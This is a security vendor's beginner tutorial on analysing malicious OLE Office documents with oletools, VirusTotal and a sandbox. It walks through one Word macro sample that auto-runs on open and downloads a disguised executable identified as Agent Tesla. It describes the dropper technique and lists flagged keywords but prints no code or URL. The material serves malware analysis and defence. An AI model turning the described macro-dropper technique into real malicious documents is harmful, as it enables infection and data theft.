Blog

Back

The beginners Guide To – OLE Malware Reverse Engineering Part 1

By BUFFERZONE Team, 19/06/2023

Target: Cybersecurity specialist

Tags: OLE, PowerPoint, Excel, Word, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering.

Microsoft’s Object Linking and Embedding (OLE) [1] is an innovative technology framework that enables the creation of intricate documents across diverse applications. It empowers Windows applications to construct objects, which can then be linked to or embedded within other documents or applications. The OLE file format engenders a compound document structure, which significantly enhances user interactivity and provides a richer, more dynamic experience.

The OLE file format specification [1] served as the default file format for Microsoft Office applications such as Word (“.doc”), PowerPoint (“.ppt”), and Excel (“.xls”) from 1997 to 2003. However, from 2003 onwards, a new file format known as Office Open XML (OOXML) was introduced. We will delve into the intricacies of OOXML in future discussions. Nonetheless, both the OLE and OOXML file formats are still extensively utilized today due to their flexibility and compatibility. A comprehensive list of Microsoft Office supported file formats per file extension can be found in this link [2], indicating their continued relevance in the digital workspace.

However, the flexibility and complexity inherent in the OLE format are also exploited by malware authors for the following reasons:

Versatility and Concealment: OLE’s inherent capability to embed various object types, including executable codes, enables malware authors to disguise malicious code within harmless files. This can be used to take advantage of the parsing vulnerabilities in the Component Object Model (COM) [3] objects or to camouflage malicious code, making it more difficult for antivirus software to detect.
Broad Usage: The ubiquity of Microsoft Office applications, which extensively employ the OLE format, provides a large base of potential targets worldwide. Consequently, this wide usage makes them an attractive avenue for attackers. In many instances, users tend to open these documents without a second thought, especially when they come from seemingly trustworthy sources, making the spread of malware even easier.
Complexity and Obfuscation: The complexity of the OLE format can be utilized to obfuscate the true intent of malicious code, making its detection and analysis more challenging for cybersecurity tools and professionals. The format’s capacity to embed or link diverse object types can be manipulated to mask the presence of harmful elements within the compound structure of the document.
Trust Exploitation: Files created in familiar applications, such as Word or Excel, are often considered safe by users. This implicit trust can be exploited by malware authors who embed malicious elements within such documents. As a result, harmful content can potentially bypass initial security checks, leading to successful infiltration.

In response to these threats, there is a continuous development of advanced security measures and tools aimed at detecting and disarming such exploits. However, the intricate and versatile nature of the OLE format continues to present a significant challenge in the field of cybersecurity. These factors combined make OLE files an attractive medium for malware authors.

OLE File Format

There have been two main versions of OLE: OLE 1.0 and OLE 2.0. An OLE file is a compound file and it is structured as a file system within a file.

OLE 1.0: This is Microsoft’s first version. It allowed documents created in one application to be embedded into another. But it only worked with Microsoft’s own applications and was limited in other ways. 0 is specified to allow only for backward-compatible implementations.
OLE 2.0: Is an improved version of OLE. It works with more than just documents and can interact with software components. It improved user interaction with features like drag-and-drop, and it allowed users to edit embedded objects without leaving the original application.

In this blog we will focus on OLE 2.0.

The OLE 2.0 contains data objects that are stored as files within the file and directory tables that provide reference information to the objects. The directories in the file are called storages and file objects are called streams.

Oletools [4] is a suite of static analysis tools. In this blog we will use: oleid, oledir olevba and oleobj will be used in this blog.

To emphasize the structure, we will use oleid by running oledir <file>. Oledir is a script to display all the directory entries of an OLE file, including free and orphaned entries. We can observe it contains Status (used/ unused), Type (Root, Steam, Storage, Empty), the Name of the section and the structure in the file with size indication.

In this blog we will not go into the details of the Header file and File allocation Table (FAT) information [1].

Malware Investigation Research Steps:

Investigating OLE malware requires a careful and systematic approach. Below are highly suggested steps we conduct in our research:

Isolation: Always work in a safe environment when dealing with potential malware. This usually means using a sandbox or a dedicated, isolated system that is not connected to your network. In this blog we will work inside Ubuntu Virtual Machine.
Collection: The first step is gathering potentially malicious OLE files. These can be sourced from various locations like spam emails, suspicious websites, or shared through threat intelligence feeds. We will use MalwareBazaar [4] a public malware repository to receive interesting malware for analysis.
Static Analysis: Start by examining the OLE without executing it. This includes viewing the file metadata, the structure, the embedded objects, scripts, or unusual elements. In this blog we will use OleTools suite [4] and we will use oledir, oleid, olevba, and oleobj.
Dynamic Analysis: This involves monitoring the behavior of the OLE file when it is opened. You would typically use a sandbox environment for this, which can safely log the actions of the file, such as network connections, file system modifications, or registry changes. Many evasive behaviors are discovered during dynamic analysis that can highlight behavior that we missed during the static analysis, or we are unfamiliar with. This part will be outside of this blog’s focus.
Payload Extraction: If the OLE has an embedded payload, this will need to be extracted for further analysis. This could be another file, a script, or something else. Payload extraction can be done as part of the static analysis or part of the dynamic analysis features.
Code Analysis: If the OLE includes embedded or obfuscated code, such as macro or powershell, this will need to be analyzed. This involves de-obfuscating the code, understanding its functionality, and identifying any potential exploits or vulnerabilities it might use. This will be done as part of the static analysis investigation we will conduct.
Threat Intelligence Correlation: Correlate the information collected about the OLE malware with threat intelligence data. This can give information on the possible threat actors, campaigns, their methods, or whether this malware has been observed before. This step is done after the collection and during the static and dynamic analysis. When we discover Information of Compromise (IOC) which are a list of drop file (sha256 /MD5 hash representation), URL’s, IP addressed in the file we can enhance our understanding of the file capabilities based on threat intelligence.
Reporting: Finally, document your findings. This report should detail the characteristics of the malware, how it works, its impact, and recommended mitigation strategies.

Remember to always stay safe when investigating potential malware, and only do so in a controlled and isolated environment. It is important to keep systems and software up to date to protect against known vulnerabilities that malware often exploits. This tutorial is for educational purposes only. Please take full responsibility while handling dangerous malicious files.

OLE Research

In this blog we will investigate sha256: 91cf5e5060f254905b48d517addd966c3f43454de14c376e8cb3b45fbd3058c9

Threat Intelligence:

The first stage will be reviewing the file in VirusTotal to get reputation and information about the file.

We can observe that the file is detected as malicious by 44 engines and the popular threat is trojan type valyria/w97m

Dynamic Analysis:

From viewing the file in a Joe security sandbox environment (Link ) we can observe that the file has a lure image:

The image luring the user to “Enable editing” and “Enable Content” this is a classical lure content to enable the execution of dynamic content inside the document.

We can observe that the malware drops from the internet an executable (.png file which is an executable and not an image) and run it.

Now let’s do the same based on static analysis.

Static Analysis:

We will initiate our analysis using oleid, a script specifically designed to scrutinize OLE files. It can identify distinctive attributes associated with malicious files. Notably, it can detect the presence of VBA macros and embedded Flash objects.

After running oleid <file>:

The oleid analysis reveals the presence of a VBA macro within our system, with the additional detail that it contains certain suspicious keywords. As a result, we will be executing the olevba <file> command.

The output uncovers pertinent details regarding the VBA macro detected. It is evident that there is an auto execution command within the document, identified through the keyword ‘Document_open’. A series of suspicious keywords have also been flagged: ‘Open’, ‘write’, ‘savetofile’, ‘shell’, ‘WScript.Shell’, and ‘CreateObject Microsoft.XMLHTTP’, suggesting substantial activity within this VBA macro.

Additionally, we have received an Indication of Compromise (IOC) that pinpoints a URL. Upon conducting a dynamic analysis, we discovered that despite being expected to be a PNG file, it was, in fact, executable.

The use of Olevba allows us to inspect the macro more closely. It reveals that upon opening the document, the script instantaneously downloads the faux PNG file, stores it, and subsequently executes it. This behavior corresponds precisely to what we observed during our dynamic analysis.

At the time of this blog writing the website is already down and we cannot download the malicious file manually (only inside secure virtual machine). But from the dynamic analysis of the document file, we can search its sha256 in VirtusTotal:

We can observe that the downloaded executable is recognized by most detection engines:

From VirusTotal we can observe the behavior and community sections that contains different sandbox vendors that analyze the executable from their analysis we can learn that the file is a sample of Agent Tesla spyware. We strongly recommend visiting the Community section of VirusTotal to explore the diverse dynamic analyses conducted on this file.

References

[1] Object Linking and Embedding (OLE) Data Structures, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-oleds/85583d21-c1cf-4afe-a35f-d6701c5fbb6f

[2] File format reference for Word, Excel, and PowerPoint, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

[3] Component Object Model (COM), https://learn.microsoft.com/en-us/windows/win32/com/component-object-model–com–portal

[4] OleTools, https://github.com/decalage2/oletools

Request Demo

Enterprise

Virtual Desktops

Financial

Blog

The beginners Guide To – OLE Malware Reverse Engineering Part 1

By BUFFERZONE Team, 19/06/2023

Share

OLE File Format

Malware Investigation Research Steps:

OLE Research

Threat Intelligence:

Dynamic Analysis:

Static Analysis:

References

Product

Company

Resources

News & Events

Contact

Blog